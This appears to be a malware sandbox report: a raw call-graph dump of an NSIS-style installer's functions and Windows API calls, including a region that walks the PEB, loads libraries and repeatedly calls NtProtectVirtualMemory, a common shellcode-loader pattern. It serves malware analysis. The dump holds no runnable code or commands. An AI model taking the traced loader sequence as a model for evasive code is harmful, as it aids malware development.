19906 4036e6 19898->19906 19899 4037e4 19900 4037f8 GetTempPathW 19899->19900 19971 4034fc 19900->19971 19902 403810 19903 403814 GetWindowsDirectoryW lstrcatW 19902->19903 19904 40386a DeleteFileW 19902->19904 19907 4034fc 12 API calls 19903->19907 19981 40307d GetTickCount GetModuleFileNameW 19904->19981 19905 405e39 CharNextW 19905->19906 19906->19899 19906->19905 19912 4037e6 19906->19912 19909 403830 19907->19909 19909->19904 19911 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 19909->19911 19910 40387d 19913 403941 19910->19913 19919 405e39 CharNextW 19910->19919 19954 403932 19910->19954 19915 4034fc 12 API calls 19911->19915 20065 40653d lstrcpynW 19912->20065 20070 403b12 19913->20070 19918 403862 19915->19918 19918->19904 19918->19913 19932 40389f 19919->19932 19921 403a69 20077 405b9d 19921->20077 19922 403a7e 19924 403a86 GetCurrentProcess OpenProcessToken 19922->19924 19925 403afc ExitProcess 19922->19925 19930 403acc 19924->19930 19931 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 19924->19931 19927 403908 19934 405f14 18 API calls 19927->19934 19928 403949 19933 405b08 5 API calls 19928->19933 19935 40690a 5 API calls 19930->19935 19931->19930 19932->19927 19932->19928 19936 40394e lstrcatW 19933->19936 19937 403914 19934->19937 19938 403ad3 19935->19938 19939 40396a lstrcatW lstrcmpiW 19936->19939 19940 40395f lstrcatW 19936->19940 19937->19913 20066 40653d lstrcpynW 19937->20066 19941 403ae8 ExitWindowsEx 19938->19941 19942 403af5 19938->19942 19939->19913 19943 40398a 19939->19943 19940->19939 19941->19925 19941->19942 19945 40140b 2 API calls 19942->19945 19946 403996 19943->19946 19947 40398f 19943->19947 19945->19925 19950 405aeb 2 API calls 19946->19950 19949 405a6e 4 API calls 19947->19949 19948 403927 20067 40653d lstrcpynW 19948->20067 19952 403994 19949->19952 19953 40399b SetCurrentDirectoryW 19950->19953 19952->19953 19955 4039b8 19953->19955 19956 4039ad 19953->19956 20009 403bec 19954->20009 20069 40653d lstrcpynW 19955->20069 20068 40653d lstrcpynW 19956->20068 19959 40657a 17 API calls 19960 4039fa DeleteFileW 19959->19960 19961 403a06 CopyFileW 19960->19961 19966 4039c5 19960->19966 19961->19966 19962 403a50 19963 4062fd 36 API calls 19962->19963 19963->19913 19964 4062fd 36 API calls 19964->19966 19965 40657a 17 API calls 19965->19966 19966->19959 19966->19962 19966->19964 19966->19965 19967 405b20 2 API calls 19966->19967 19968 403a3a CloseHandle 19966->19968 19967->19966 19968->19966 19969->19894 19970->19896 19972 4067c4 5 API calls 19971->19972 19974 403508 19972->19974 19973 403512 19973->19902 19974->19973 19975 405e0c 3 API calls 19974->19975 19976 40351a 19975->19976 19977 405aeb 2 API calls 19976->19977 19978 403520 19977->19978 19979 40605c 2 API calls 19978->19979 19980 40352b 19979->19980 19980->19902 20081 40602d GetFileAttributesW CreateFileW 19981->20081 19983 4030bd 20007 4030cd 19983->20007 20082 40653d lstrcpynW 19983->20082 19985 4030e3 19986 405e58 2 API calls 19985->19986 19987 4030e9 19986->19987 20083 40653d lstrcpynW 19987->20083 19989 4030f4 GetFileSize 19990 4031ee 19989->19990 20008 40310b 19989->20008 20084 403019 19990->20084 19992 4031f7 19994 403227 GlobalAlloc 19992->19994 19992->20007 20096 4034e5 SetFilePointer 19992->20096 19993 4034cf ReadFile 19993->20008 20095 4034e5 SetFilePointer 19994->20095 19996 40325a 20000 403019 6 API calls 19996->20000 19998 403210 20001 4034cf ReadFile 19998->20001 19999 403242 20002 4032b4 31 API calls 19999->20002 20000->20007 20003 40321b 20001->20003 20005 40324e 20002->20005 20003->19994 20003->20007 20004 403019 6 API calls 20004->20008 20005->20005 20006 40328b SetFilePointer 20005->20006 20005->20007 20006->20007 20007->19910 20008->19990 20008->19993 20008->19996 20008->20004 20008->20007 20010 40690a 5 API calls 20009->20010 20011 403c00 20010->20011 20012 403c06 20011->20012 20013 403c18 20011->20013 20105 406484 wsprintfW 20012->20105 20014 40640b 3 API calls 20013->20014 20015 403c48 20014->20015 20016 403c67 lstrcatW 20015->20016 20018 40640b 3 API calls 20015->20018 20019 403c16 20016->20019 20018->20016 20097 403ec2 20019->20097 20022 405f14 18 API calls 20023 403c99 20022->20023 20024 403d2d 20023->20024 20026 40640b 3 API calls 20023->20026 20025 405f14 18 API calls 20024->20025 20027 403d33 20025->20027 20028 403ccb 20026->20028 20029 403d43 LoadImageW 20027->20029 20030 40657a 17 API calls 20027->20030 20028->20024 20036 403cec lstrlenW 20028->20036 20037 405e39 CharNextW 20028->20037 20031 403de9 20029->20031 20032 403d6a RegisterClassW 20029->20032 20030->20029 20035 40140b 2 API calls 20031->20035 20033 403da0 SystemParametersInfoW CreateWindowExW 20032->20033 20034 403df3 20032->20034 20033->20031 20034->19913 20040 403def 20035->20040 20038 403d20 20036->20038 20039 403cfa lstrcmpiW 20036->20039 20041 403ce9 20037->20041 20043 405e0c 3 API calls 20038->20043 20039->20038 20042 403d0a GetFileAttributesW 20039->20042 20040->20034 20045 403ec2 18 API calls 20040->20045 20041->20036 20044 403d16 20042->20044 20046 403d26 20043->20046 20044->20038 20047 405e58 2 API calls 20044->20047 20048 403e00 20045->20048 20106 40653d lstrcpynW 20046->20106 20047->20038 20050 403e0c ShowWindow 20048->20050 20051 403e8f 20048->20051 20053 40689a 3 API calls 20050->20053 20052 405672 5 API calls 20051->20052 20054 403e95 20052->20054 20055 403e24 20053->20055 20056 403eb1 20054->20056 20060 403e99 20054->20060 20057 403e32 GetClassInfoW 20055->20057 20062 40689a 3 API calls 20055->20062 20061 40140b 2 API calls 20056->20061 20058 403e46 GetClassInfoW RegisterClassW 20057->20058 20059 403e5c DialogBoxParamW 20057->20059 20058->20059 20063 40140b 2 API calls 20059->20063 20060->20034 20064 40140b 2 API calls 20060->20064 20061->20034 20062->20057 20063->20034 20064->20034 20065->19900 20066->19948 20067->19954 20068->19955 20069->19966 20071 403b2a 20070->20071 20072 403b1c CloseHandle 20070->20072 20108 403b57 20071->20108 20072->20071 20075 405c49 67 API calls 20076 403a5e OleUninitialize 20075->20076 20076->19921 20076->19922 20078 405bb2 20077->20078 20079 403a76 ExitProcess 20078->20079 20080 405bc6 MessageBoxIndirectW 20078->20080 20080->20079 20081->19983 20082->19985 20083->19989 20085 403022 20084->20085 20086 40303a 20084->20086 20087 403032 20085->20087 20088 40302b DestroyWindow 20085->20088 20089 403042 20086->20089 20090 40304a GetTickCount 20086->20090 20087->19992 20088->20087 20093 406946 2 API calls 20089->20093 20091 403058 CreateDialogParamW ShowWindow 20090->20091 20092 40307b 20090->20092 20091->20092 20092->19992 20094 403048 20093->20094 20094->19992 20095->19999 20096->19998 20098 403ed6 20097->20098 20107 406484 wsprintfW 20098->20107 20100 403f47 20101 403f7b 18 API calls 20100->20101 20103 403f4c 20101->20103 20102 403c77 20102->20022 20103->20102 20104 40657a 17 API calls 20103->20104 20104->20103 20105->20019 20106->20024 20107->20100 20109 403b65 20108->20109 20110 403b2f 20109->20110 20111 403b6a FreeLibrary GlobalFree 20109->20111 20110->20075 20111->20110 20111->20111 20167 402434 20168 402467 20167->20168 20169 40243c 20167->20169 20170 402da6 17 API calls 20168->20170 20171 402de6 17 API calls 20169->20171 20172 40246e 20170->20172 20173 402443 20171->20173 20179 402e64 20172->20179 20175 40244d 20173->20175 20178 40247b 20173->20178 20176 402da6 17 API calls 20175->20176 20177 402454 RegDeleteValueW RegCloseKey 20176->20177 20177->20178 20180 402e71 20179->20180 20181 402e78 20179->20181 20180->20178 20181->20180 20183 402ea9 20181->20183 20184 4063aa RegOpenKeyExW 20183->20184 20185 402ed7 20184->20185 20186 402ee1 20185->20186 20187 402f8c 20185->20187 20188 402ee7 RegEnumValueW 20186->20188 20192 402f0a 20186->20192 20187->20180 20189 402f71 RegCloseKey 20188->20189 20188->20192 20189->20187 20190 402f46 RegEnumKeyW 20191 402f4f RegCloseKey 20190->20191 20190->20192 20193 40690a 5 API calls 20191->20193 20192->20189 20192->20190 20192->20191 20194 402ea9 6 API calls 20192->20194 20195 402f5f 20193->20195 20194->20192 20196 402f81 20195->20196 20197 402f63 RegDeleteKeyW 20195->20197 20196->20187 20197->20187 21113 40263e 21114 402652 21113->21114 21115 40266d 21113->21115 21116 402d84 17 API calls 21114->21116 21117 402672 21115->21117 21118 40269d 21115->21118 21125 402659 21116->21125 21120 402da6 17 API calls 21117->21120 21119 402da6 17 API calls 21118->21119 21122 4026a4 lstrlenW 21119->21122 21121 402679 21120->21121 21130 40655f WideCharToMultiByte 21121->21130 21122->21125 21124 40268d lstrlenA 21124->21125 21126 4026d1 21125->21126 21128 4026e7 21125->21128 21129 40610e 5 API calls 21125->21129 21127 4060df WriteFile 21126->21127 21126->21128 21127->21128 21129->21126 21130->21124 19189 4015c1 19190 402da6 17 API calls 19189->19190 19191 4015c8 19190->19191 19192 405eb7 4 API calls 19191->19192 19204 4015d1 19192->19204 19193 401631 19195 401636 19193->19195 19197 401663 19193->19197 19194 405e39 CharNextW 19194->19204 19216 401423 19195->19216 19199 401423 24 API calls 19197->19199 19206 40165b 19199->19206 19203 40164a SetCurrentDirectoryW 19203->19206 19204->19193 19204->19194 19205 401617 GetFileAttributesW 19204->19205 19208 405b08 19204->19208 19211 405a6e CreateDirectoryW 19204->19211 19220 405aeb CreateDirectoryW 19204->19220 19205->19204 19223 40690a GetModuleHandleA 19208->19223 19212 405abb 19211->19212 19213 405abf GetLastError 19211->19213 19212->19204 19213->19212 19214 405ace SetFileSecurityW 19213->19214 19214->19212 19215 405ae4 GetLastError 19214->19215 19215->19212 19217 40559f 24 API calls 19216->19217 19218 401431 19217->19218 19219 40653d lstrcpynW 19218->19219 19219->19203 19221 405afb 19220->19221 19222 405aff GetLastError 19220->19222 19221->19204 19222->19221 19224 406930 GetProcAddress 19223->19224 19225 406926 19223->19225 19228 405b0f 19224->19228 19229 40689a GetSystemDirectoryW 19225->19229 19227 40692c 19227->19224 19227->19228 19228->19204 19230 4068bc wsprintfW LoadLibraryExW 19229->19230 19230->19227 19284 4014cb 19285 40559f 24 API calls 19284->19285 19286 4014d2 19285->19286 21150 4016cc 21151 402da6 17 API calls 21150->21151 21152 4016d2 GetFullPathNameW 21151->21152 21153 40170e 21152->21153 21156 4016ec 21152->21156 21154 401723 GetShortPathNameW 21153->21154 21155 402c2a 21153->21155 21154->21155 21156->21153 21157 406873 2 API calls 21156->21157 21158 4016fe 21157->21158 21158->21153 21160 40653d lstrcpynW 21158->21160 21160->21153 19299 4020d8 19300 4020ea 19299->19300 19310 40219c 19299->19310 19301 402da6 17 API calls 19300->19301 19302 4020f1 19301->19302 19304 402da6 17 API calls 19302->19304 19303 401423 24 API calls 19305 4022f6 19303->19305 19306 4020fa 19304->19306 19307 402110 LoadLibraryExW 19306->19307 19308 402102 GetModuleHandleW 19306->19308 19309 402121 19307->19309 19307->19310 19308->19307 19308->19309 19322 406979 19309->19322 19310->19303 19313 402132 19316 402151 19313->19316 19317 40213a 19313->19317 19314 40216b 19315 40559f 24 API calls 19314->19315 19318 402142 19315->19318 19327 71541817 19316->19327 19319 401423 24 API calls 19317->19319 19318->19305 19320 40218e FreeLibrary 19318->19320 19319->19318 19320->19305 19369 40655f WideCharToMultiByte 19322->19369 19324 406996 19325 40699d GetProcAddress 19324->19325 19326 40212c 19324->19326 19325->19326 19326->19313 19326->19314 19328 7154184a 19327->19328 19370 71541bff 19328->19370 19330 71541851 19331 71541976 19330->19331 19332 71541862 19330->19332 19333 71541869 19330->19333 19331->19318 19420 7154243e 19332->19420 19404 71542480 19333->19404 19338 715418cd 19342 715418d3 19338->19342 19343 7154191e 19338->19343 19339 715418af 19433 71542655 19339->19433 19340 7154187f 19345 71541885 19340->19345 19351 71541890 19340->19351 19341 71541898 19352 7154188e 19341->19352 19430 71542e23 19341->19430 19452 71541666 19342->19452 19349 71542655 10 API calls 19343->19349 19345->19352 19414 71542b98 19345->19414 19355 7154190f 19349->19355 19350 715418b5 19444 71541654 19350->19444 19424 71542810 19351->19424 19352->19338 19352->19339 19361 71541965 19355->19361 19458 71542618 19355->19458 19358 71541896 19358->19352 19359 71542655 10 API calls 19359->19355 19361->19331 19363 7154196f GlobalFree 19361->19363 19363->19331 19366 71541951 19366->19361 19462 715415dd wsprintfW 19366->19462 19367 7154194a FreeLibrary 19367->19366 19369->19324 19465 715412bb GlobalAlloc 19370->19465 19372 71541c26 19466 715412bb GlobalAlloc 19372->19466 19374 71541e6b GlobalFree GlobalFree GlobalFree 19375 71541e88 19374->19375 19386 71541ed2 19374->19386 19376 7154227e 19375->19376 19384 71541e9d 19375->19384 19375->19386 19378 715422a0 GetModuleHandleW 19376->19378 19376->19386 19377 71541d26 GlobalAlloc 19396 71541c31 19377->19396 19380 715422c6 19378->19380 19381 715422b1 LoadLibraryW 19378->19381 19379 71541d8f GlobalFree 19379->19396 19473 715416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19380->19473 19381->19380 19381->19386 19382 71541d71 lstrcpyW 19383 71541d7b lstrcpyW 19382->19383 19383->19396 19384->19386 19469 715412cc 19384->19469 19386->19330 19387 71542318 19387->19386 19391 71542325 lstrlenW 19387->19391 19388 71542126 19472 715412bb GlobalAlloc 19388->19472 19474 715416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19391->19474 19392 71542067 GlobalFree 19392->19396 19393 715421ae 19393->19386 19401 71542216 lstrcpyW 19393->19401 19394 715422d8 19394->19387 19402 71542302 GetProcAddress 19394->19402 19396->19374 19396->19377 19396->19379 19396->19382 19396->19383 19396->19386 19396->19388 19396->19392 19396->19393 19397 71541dcd 19396->19397 19399 715412cc 2 API calls 19396->19399 19397->19396 19467 7154162f GlobalSize GlobalAlloc 19397->19467 19398 7154233f 19398->19386 19399->19396 19401->19386 19402->19387 19403 7154212f 19403->19330 19411 71542498 19404->19411 19405 715412cc GlobalAlloc lstrcpynW 19405->19411 19407 715425c1 GlobalFree 19410 7154186f 19407->19410 19407->19411 19408 71542540 GlobalAlloc WideCharToMultiByte 19408->19407 19409 7154256b GlobalAlloc CLSIDFromString 19409->19407 19410->19340 19410->19341 19410->19352 19411->19405 19411->19407 19411->19408 19411->19409 19413 7154258a 19411->19413 19476 7154135a 19411->19476 19413->19407 19480 715427a4 19413->19480 19416 71542baa 19414->19416 19415 71542c4f CreateFileA 19419 71542c6d 19415->19419 19416->19415 19418 71542d39 19418->19352 19483 71542b42 19419->19483 19421 71542453 19420->19421 19422 7154245e GlobalAlloc 19421->19422 19423 71541868 19421->19423 19422->19421 19423->19333 19429 71542840 19424->19429 19425 715428ee 19427 715428f4 GlobalSize 19425->19427 19428 715428fe 19425->19428 19426 715428db GlobalAlloc 19426->19428 19427->19428 19428->19358 19429->19425 19429->19426 19432 71542e2e 19430->19432 19431 71542e6e GlobalFree 19432->19431 19487 715412bb GlobalAlloc 19433->19487 19435 715426d8 MultiByteToWideChar 19438 7154265f 19435->19438 19436 715426fa StringFromGUID2 19436->19438 19437 7154270b lstrcpynW 19437->19438 19438->19435 19438->19436 19438->19437 19439 7154271e wsprintfW 19438->19439 19440 71542742 GlobalFree 19438->19440 19441 71542777 GlobalFree 19438->19441 19442 71541312 2 API calls 19438->19442 19488 71541381 19438->19488 19439->19438 19440->19438 19441->19350 19442->19438 19492 715412bb GlobalAlloc 19444->19492 19446 71541659 19447 71541666 2 API calls 19446->19447 19448 71541663 19447->19448 19449 71541312 19448->19449 19450 71541355 GlobalFree 19449->19450 19451 7154131b GlobalAlloc lstrcpynW 19449->19451 19450->19355 19451->19450 19453 71541672 wsprintfW 19452->19453 19454 7154169f lstrcpyW 19452->19454 19457 715416b8 19453->19457 19454->19457 19457->19359 19459 71541931 19458->19459 19460 71542626 19458->19460 19459->19366 19459->19367 19460->19459 19461 71542642 GlobalFree 19460->19461 19461->19460 19463 71541312 2 API calls 19462->19463 19464 715415fe 19463->19464 19464->19361 19465->19372 19466->19396 19468 7154164d 19467->19468 19468->19397 19475 715412bb GlobalAlloc 19469->19475 19471 715412db lstrcpynW 19471->19386 19472->19403 19473->19394 19474->19398 19475->19471 19477 71541361 19476->19477 19478 715412cc 2 API calls 19477->19478 19479 7154137f 19478->19479 19479->19411 19481 715427b2 VirtualAlloc 19480->19481 19482 71542808 19480->19482 19481->19482 19482->19413 19484 71542b4d 19483->19484 19485 71542b52 GetLastError 19484->19485 19486 71542b5d 19484->19486 19485->19486 19486->19418 19487->19438 19489 715413ac 19488->19489 19490 7154138a 19488->19490 19489->19438 19490->19489 19491 71541390 lstrcpyW 19490->19491 19491->19489 19492->19446 19628 401ede 19629 402d84 17 API calls 19628->19629 19630 401ee4 19629->19630 19631 402d84 17 API calls 19630->19631 19632 401ef0 19631->19632 19633 401f07 EnableWindow 19632->19633 19634 401efc ShowWindow 19632->19634 19635 402c2a 19633->19635 19634->19635 19636 4056de 19637 405888 19636->19637 19638 4056ff GetDlgItem GetDlgItem GetDlgItem 19636->19638 19640 405891 GetDlgItem CreateThread CloseHandle 19637->19640 19641 4058b9 19637->19641 19682 4044ce SendMessageW 19638->19682 19640->19641 19685 405672 OleInitialize 19640->19685 19642 4058e4 19641->19642 19643 4058d0 ShowWindow ShowWindow 19641->19643 19644 405909 19641->19644 19645 4058f0 19642->19645 19646 405944 19642->19646 19684 4044ce SendMessageW 19643->19684 19651 404500 8 API calls 19644->19651 19649 4058f8 19645->19649 19650 40591e ShowWindow 19645->19650 19646->19644 19655 405952 SendMessageW 19646->19655 19647 40576f 19652 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 19647->19652 19656 404472 SendMessageW 19649->19656 19658 405930 19650->19658 19659 40593e 19650->19659 19657 405917 19651->19657 19653 4057e4 19652->19653 19654 4057c8 SendMessageW SendMessageW 19652->19654 19660 4057f7 19653->19660 19661 4057e9 SendMessageW 19653->19661 19654->19653 19655->19657 19662 40596b CreatePopupMenu 19655->19662 19656->19644 19663 40559f 24 API calls 19658->19663 19664 404472 SendMessageW 19659->19664 19666 404499 18 API calls 19660->19666 19661->19660 19665 40657a 17 API calls 19662->19665 19663->19659 19664->19646 19667 40597b AppendMenuW 19665->19667 19668 405807 19666->19668 19669 405998 GetWindowRect 19667->19669 19670 4059ab TrackPopupMenu 19667->19670 19671 405810 ShowWindow 19668->19671 19672 405844 GetDlgItem SendMessageW 19668->19672 19669->19670 19670->19657 19673 4059c6 19670->19673 19674 405833 19671->19674 19675 405826 ShowWindow 19671->19675 19672->19657 19676 40586b SendMessageW SendMessageW 19672->19676 19677 4059e2 SendMessageW 19673->19677 19683 4044ce SendMessageW 19674->19683 19675->19674 19676->19657 19677->19677 19678 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 19677->19678 19680 405a24 SendMessageW 19678->19680 19680->19680 19681 405a4d GlobalUnlock SetClipboardData CloseClipboard 19680->19681 19681->19657 19682->19647 19683->19672 19684->19642 19686 4044e5 SendMessageW 19685->19686 19691 405695 19686->19691 19687 4056bc 19688 4044e5 SendMessageW 19687->19688 19689 4056ce OleUninitialize 19688->19689 19690 401389 2 API calls 19690->19691 19691->19687 19691->19690 19792 2cc5269 19793 2cc34f4 4 API calls 19792->19793 19794 2cc527a 19793->19794 19795 2cc34f4 4 API calls 19794->19795 19796 2cc5292 19795->19796 19797 2cc52a0 GetPEB 19796->19797 19798 2cc52ea 19797->19798 19799 2cc34f4 19798->19799 19802 2cc53be 19798->19802 19800 2cc35b9 19799->19800 19801 2cc3617 LoadLibraryA 19799->19801 19803 2cc3d6a 3 API calls 19800->19803 19805 2cc3654 3 API calls 19801->19805 19821 2cc61b4 19802->19821 19806 2cc35c8 19803->19806 19807 2cc3626 19805->19807 19808 2cc3654 3 API calls 19806->19808 19809 2cc3610 19808->19809 19809->19801 19810 2cc5b8d 19814 2cc5f27 19810->19814 19818 2cc5c56 19810->19818 19811 2cc53c4 19811->19810 19815 2cc56fa 19811->19815 19817 2cb381c 19811->19817 19812 2cc61b4 NtProtectVirtualMemory 19813 2cc61ab 19812->19813 19814->19812 19814->19817 19816 2cc61b4 NtProtectVirtualMemory 19815->19816 19815->19817 19816->19817 19818->19817 19819 2cc61b4 NtProtectVirtualMemory 19818->19819 19820 2cc5f11 19819->19820 19822 2cc6238 NtProtectVirtualMemory 19821->19822 19822->19811 19854 4026ec 19855 402d84 17 API calls 19854->19855 19857 4026fb 19855->19857 19856 402745 ReadFile 19856->19857 19867 402838 19856->19867 19857->19856 19858 4060b0 ReadFile 19857->19858 19859 402785 MultiByteToWideChar 19857->19859 19860 40283a 19857->19860 19863 4027de 19857->19863 19864 4027ab SetFilePointer MultiByteToWideChar 19857->19864 19865 40284b 19857->19865 19857->19867 19858->19857 19859->19857 19877 406484 wsprintfW 19860->19877 19863->19857 19863->19867 19868 40610e SetFilePointer 19863->19868 19864->19857 19866 40286c SetFilePointer 19865->19866 19865->19867 19866->19867 19869 40612a 19868->19869 19872 406142 19868->19872 19870 4060b0 ReadFile 19869->19870 19871 406136 19870->19871 19871->19872 19873 406173 SetFilePointer 19871->19873 19874 40614b SetFilePointer 19871->19874 19872->19863 19873->19872 19874->19873 19875 406156 19874->19875 19876 4060df WriteFile 19875->19876 19876->19872 19877->19867 21174 2cb487e 21177 2cb4885 21174->21177 21175 2cb4875 21176 2cc37f4 3 API calls 21176->21177 21177->21175 21177->21176 21179 2cb4a0e 21177->21179 21178 2cc4e88 4 API calls 21180 2cc4e83 21178->21180 21179->21178 21182 2cb4a35 21179->21182 21181 2cc4e88 4 API calls 21180->21181 21181->21180 21474 401ff6 21475 402da6 17 API calls 21474->21475 21476 401ffd 21475->21476 21477 406873 2 API calls 21476->21477 21478 402003 21477->21478 21479 402014 21478->21479 21481 406484 wsprintfW 21478->21481 21481->21479 19232 40248a 19233 402da6 17 API calls 19232->19233 19234 40249c 19233->19234 19235 402da6 17 API calls 19234->19235 19236 4024a6 19235->19236 19249 402e36 19236->19249 19239 402c2a 19240 4024de 19242 4024ea 19240->19242 19273 402d84 19240->19273 19241 402da6 17 API calls 19243 4024d4 lstrlenW 19241->19243 19245 402509 RegSetValueExW 19242->19245 19253 4032b4 19242->19253 19243->19240 19247 40251f RegCloseKey 19245->19247 19247->19239 19250 402e51 19249->19250 19276 4063d8 19250->19276 19254 4032cd 19253->19254 19255 4032fb 19254->19255 19283 4034e5 SetFilePointer 19254->19283 19280 4034cf 19255->19280 19259 403468 19261 4034aa 19259->19261 19266 40346c 19259->19266 19260 403318 GetTickCount 19262 403452 19260->19262 19269 403367 19260->19269 19264 4034cf ReadFile 19261->19264 19262->19245 19263 4034cf ReadFile 19263->19269 19264->19262 19265 4034cf ReadFile 19265->19266 19266->19262 19266->19265 19267 4060df WriteFile 19266->19267 19267->19266 19268 4033bd GetTickCount 19268->19269 19269->19262 19269->19263 19269->19268 19270 4033e2 MulDiv wsprintfW 19269->19270 19272 4060df WriteFile 19269->19272 19271 40559f 24 API calls 19270->19271 19271->19269 19272->19269 19274 40657a 17 API calls 19273->19274 19275 402d99 19274->19275 19275->19242 19277 4063e7 19276->19277 19278 4063f2 RegCreateKeyExW 19277->19278 19279 4024b6 19277->19279 19278->19279 19279->19239 19279->19240 19279->19241 19281 4060b0 ReadFile 19280->19281 19282 403306 19281->19282 19282->19259 19282->19260 19282->19262 19283->19255 19287 402891 19288 402898 19287->19288 19291 402ba9 19287->19291 19289 402d84 17 API calls 19288->19289 19290 40289f 19289->19290 19292 4028ae SetFilePointer 19290->19292 19292->19291 19293 4028be 19292->19293 19295 406484 wsprintfW 19293->19295 19295->19291 19493 403f9a 19494 403fb2 19493->19494 19495 404113 19493->19495 19494->19495 19496 403fbe 19494->19496 19497 404164 19495->19497 19498 404124 GetDlgItem GetDlgItem 19495->19498 19500 403fc9 SetWindowPos 19496->19500 19501 403fdc 19496->19501 19499 4041be 19497->19499 19507 401389 2 API calls 19497->19507 19502 404499 18 API calls 19498->19502 19520 40410e 19499->19520 19566 4044e5 19499->19566 19500->19501 19504 403fe5 ShowWindow 19501->19504 19505 404027 19501->19505 19506 40414e SetClassLongW 19502->19506 19508 404100 19504->19508 19509 404005 GetWindowLongW 19504->19509 19510 404046 19505->19510 19511 40402f DestroyWindow 19505->19511 19512 40140b 2 API calls 19506->19512 19513 404196 19507->19513 19588 404500 19508->19588 19509->19508 19515 40401e ShowWindow 19509->19515 19516 40404b SetWindowLongW 19510->19516 19517 40405c 19510->19517 19565 404422 19511->19565 19512->19497 19513->19499 19519 40419a SendMessageW 19513->19519 19515->19505 19516->19520 19517->19508 19518 404068 GetDlgItem 19517->19518 19523 404096 19518->19523 19524 404079 SendMessageW IsWindowEnabled 19518->19524 19519->19520 19521 40140b 2 API calls 19538 4041d0 19521->19538 19522 404424 DestroyWindow EndDialog 19522->19565 19526 40409b 19523->19526 19528 4040a3 19523->19528 19530 4040ea SendMessageW 19523->19530 19531 4040b6 19523->19531 19524->19520 19524->19523 19525 404453 ShowWindow 19525->19520 19585 404472 19526->19585 19527 40657a 17 API calls 19527->19538 19528->19526 19528->19530 19529 404499 18 API calls 19529->19538 19530->19508 19534 4040d3 19531->19534 19535 4040be 19531->19535 19533 4040d1 19533->19508 19536 40140b 2 API calls 19534->19536 19582 40140b 19535->19582 19539 4040da 19536->19539 19538->19520 19538->19521 19538->19522 19538->19527 19538->19529 19556 404364 DestroyWindow 19538->19556 19569 404499 19538->19569 19539->19508 19539->19526 19541 40424b GetDlgItem 19542 404260 19541->19542 19543 404268 ShowWindow KiUserCallbackDispatcher 19541->19543 19542->19543 19572 4044bb KiUserCallbackDispatcher 19543->19572 19545 404292 EnableWindow 19550 4042a6 19545->19550 19546 4042ab GetSystemMenu EnableMenuItem SendMessageW 19547 4042db SendMessageW 19546->19547 19546->19550 19547->19550 19550->19546 19573 4044ce SendMessageW 19550->19573 19574 403f7b 19550->19574 19577 40653d lstrcpynW 19550->19577 19552 40430a lstrlenW 19553 40657a 17 API calls 19552->19553 19554 404320 SetWindowTextW 19553->19554 19578 401389 19554->19578 19557 40437e CreateDialogParamW 19556->19557 19556->19565 19558 4043b1 19557->19558 19557->19565 19559 404499 18 API calls 19558->19559 19560 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 19559->19560 19561 401389 2 API calls 19560->19561 19562 404402 19561->19562 19562->19520 19563 40440a ShowWindow 19562->19563 19564 4044e5 SendMessageW 19563->19564 19564->19565 19565->19520 19565->19525 19567 4044fd 19566->19567 19568 4044ee SendMessageW 19566->19568 19567->19538 19568->19567 19570 40657a 17 API calls 19569->19570 19571 4044a4 SetDlgItemTextW 19570->19571 19571->19541 19572->19545 19573->19550 19575 40657a 17 API calls 19574->19575 19576 403f89 SetWindowTextW 19575->19576 19576->19550 19577->19552 19580 401390 19578->19580 19579 4013fe 19579->19538 19580->19579 19581 4013cb MulDiv SendMessageW 19580->19581 19581->19580 19583 401389 2 API calls 19582->19583 19584 401420 19583->19584 19584->19526 19586 404479 19585->19586 19587 40447f SendMessageW 19585->19587 19586->19587 19587->19533 19589 4045c3 19588->19589 19590 404518 GetWindowLongW 19588->19590 19589->19520 19590->19589 19591 40452d 19590->19591 19591->19589 19592 40455a GetSysColor 19591->19592 19593 40455d 19591->19593 19592->19593 19594 404563 SetTextColor 19593->19594 19595 40456d SetBkMode 19593->19595 19594->19595 19596 404585 GetSysColor 19595->19596 19597 40458b 19595->19597 19596->19597 19598 404592 SetBkColor 19597->19598 19599 40459c 19597->19599 19598->19599 19599->19589 19600 4045b6 CreateBrushIndirect 19599->19600 19601 4045af DeleteObject 19599->19601 19600->19589 19601->19600 19612 40259e 19623 402de6 19612->19623 19615 402d84 17 API calls 19616 4025b1 19615->19616 19617 4025d9 RegEnumValueW 19616->19617 19618 4025cd RegEnumKeyW 19616->19618 19620 40292e 19616->19620 19619 4025ee 19617->19619 19621 4025f5 RegCloseKey 19617->19621 19618->19621 19619->19621 19621->19620 19624 402da6 17 API calls 19623->19624 19625 402dfd 19624->19625 19626 4063aa RegOpenKeyExW 19625->19626 19627 4025a8 19626->19627 19627->19615 19692 4015a3 19693 402da6 17 API calls 19692->19693 19694 4015aa SetFileAttributesW 19693->19694 19695 4015bc 19694->19695 19697 401fa4 19698 402da6 17 API calls 19697->19698 19699 401faa 19698->19699 19700 40559f 24 API calls 19699->19700 19701 401fb4 19700->19701 19712 405b20 CreateProcessW 19701->19712 19704 401fdd CloseHandle 19705 40292e 19704->19705 19708 401fcf 19709 401fd4 19708->19709 19710 401fdf 19708->19710 19720 406484 wsprintfW 19709->19720 19710->19704 19713 405b53 CloseHandle 19712->19713 19714 401fba 19712->19714 19713->19714 19714->19704 19714->19705 19715 4069b5 WaitForSingleObject 19714->19715 19716 4069cf 19715->19716 19717 4069e1 GetExitCodeProcess 19716->19717 19721 406946 19716->19721 19717->19708 19720->19704 19722 406963 PeekMessageW 19721->19722 19723 406973 WaitForSingleObject 19722->19723 19724 406959 DispatchMessageW 19722->19724 19723->19716 19724->19722 20157 4023b2 20158 4023c0 20157->20158 20159 4023ba 20157->20159 20161 402da6 17 API calls 20158->20161 20163 4023ce 20158->20163 20160 402da6 17 API calls 20159->20160 20160->20158 20161->20163 20162 402da6 17 API calls 20165 4023e5 WritePrivateProfileStringW 20162->20165 20164 402da6 17 API calls 20163->20164 20166 4023dc 20163->20166 20164->20166 20166->20162

                                                                                  Executed Functions

                                                                                  Function 0040352D Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450stringfilecomCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
